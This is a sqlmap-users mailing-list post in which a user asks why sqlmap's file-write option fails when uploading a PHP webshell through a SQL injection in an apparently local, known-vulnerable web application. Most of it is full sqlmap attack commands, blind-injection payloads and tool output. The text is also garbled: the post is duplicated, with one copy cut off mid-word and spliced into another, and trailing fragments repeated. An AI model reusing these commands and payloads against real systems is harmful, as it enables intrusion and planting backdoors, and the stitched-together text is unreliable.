Hello Everyone,
I'm attempting to use sqlmap to exploit a local installation of some
software. I know it's vulnerable because it's on exploit-db & metasploit
pops it every time (http://www.exploit-db.com/exploits/20501/). I've had
limited success with sqlmap, but I'm at the final stage now where I'm
trying to use the sqli's I've found to upload a webshell via sqlmap. No
dice....I'm getting an error stating "[ERROR] none of the SQL injection
techniques detected can be used to write files to the underlying file
system of the back-end MySQL server." Other than the obvious, I'm not sure
what this means because --os-shell and --os-cmd upload a file and execute
just fine. Does --file-write need something special? Here's the output:
root@kali:/usr/share/sqlmap# sqlmap -u "
http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin";
-p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
/usr/share/webshells/php/simple-backdoor.php --file-dest
progra~1/cyclope/ni4zlja=/backdoor.php -v3
...
[*] starting at 23:13:08
[23:13:08] [DEBUG] cleaning up configuration parameters
[23:13:08] [DEBUG] setting the HTTP timeout
[23:13:08] [DEBUG] setting the HTTP method to GET
[23:13:08] [DEBUG] creating HTTP requests opener object
[23:13:08] [DEBUG] forcing back-end DBMS to user defined value
[23:13:08] [DEBUG] setting the write file functionality
[23:13:08] [INFO] testing connection to the target URL
[23:13:08] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND
'yVaP'='yVaP&password=admin
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND
'OHln'='OHln&password=admin
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[23:13:08] [INFO] testing MySQL
[23:13:08] [INFO] confirming MySQL
[23:13:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[23:13:08] [INFO] fingerprinting the back-end DBMS operating system
[23:13:08] [INFO] the back-end DBMS operating system is Windows
[23:13:08] [ERROR] none of the SQL injection techniques detected can be
used to write files to the underlying file system of the back-end MySQL
server
[23:13:08] [INFO] fetched data logged to text files under
'/usr/share/sqlmap/output/172.16.71.138'
[*] shutting down at 23:13:08
The results are the same when the cmdline is changed up for a POST version:
root@kali:/usr/share/sqlm
Hello Everyone,
I'm attempting to use sqlmap to exploit a local installation of some
software. I know it's vulnerable because it's on exploit-db & metasploit
pops it every time (http://www.exploit-db.com/exploits/20501/). I've had
limited success with sqlmap, but I'm at the final stage now where I'm
trying to use the sqli's I've found to upload a webshell via sqlmap. No
dice....I'm getting an error stating "[ERROR] none of the SQL injection
techniques detected can be used to write files to the underlying file
system of the back-end MySQL server." Other than the obvious, I'm not sure
what this means because --os-shell and --os-cmd upload a file and execute
just fine. Does --file-write need something special? Here's the output:
root@kali:/usr/share/sqlmap# sqlmap -u "
http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin";
-p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
/usr/share/webshells/php/simple-backdoor.php --file-dest
progra~1/cyclope/ni4zlja=/backdoor.php -v3
...
[*] starting at 23:13:08
[23:13:08] [DEBUG] cleaning up configuration parameters
[23:13:08] [DEBUG] setting the HTTP timeout
[23:13:08] [DEBUG] setting the HTTP method to GET
[23:13:08] [DEBUG] creating HTTP requests opener object
[23:13:08] [DEBUG] forcing back-end DBMS to user defined value
[23:13:08] [DEBUG] setting the write file functionality
[23:13:08] [INFO] testing connection to the target URL
[23:13:08] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND
'yVaP'='yVaP&password=admin
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND
'OHln'='OHln&password=admin
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[23:13:08] [INFO] testing MySQL
[23:13:08] [INFO] confirming MySQL
[23:13:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[23:13:08] [INFO] fingerprinting the back-end DBMS operating system
[23:13:08] [INFO] the back-end DBMS operating system is Windows
[23:13:08] [ERROR] none of the SQL injection techniques detected can be
used to write files to the underlying file system of the back-end MySQL
server
[23:13:08] [INFO] fetched data logged to text files under
'/usr/share/sqlmap/output/172.16.71.138'
[*] shutting down at 23:13:08
The results are the same when the cmdline is changed up for a POST version:
root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php";
--data='act=auth-login&pag=login&username=admin&password=admin' -p
"username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
/usr/share/webshells/php/simple-backdoor.php --file-dest
progra~1/cyclope/ni4zlja=/backdoor.php -v3
Any thoughts on what may be happening here would be much appreciated.
Thanks,
Brian
ap# sqlmap -u "http://172.16.71.138:7879/index.php";
--data='act=auth-login&pag=login&username=admin&password=admin' -p
"username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
/usr/share/webshells/php/simple-backdoor.php --file-dest
progra~1/cyclope/ni4zlja=/backdoor.php -v3
Any thoughts on what may be happening here would be much appreciated.
Thanks,
Brian
------------------------------------------------------------------------------
Learn Graph Databases - Download FREE O'Reilly Book
"Graph Databases" is the definitive new guide to graph databases and their
applications. Written by three acclaimed leaders in the field,
this first edition is now available. Download your free book today!
http://p.sf.net/sfu/13534_NeoTech
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
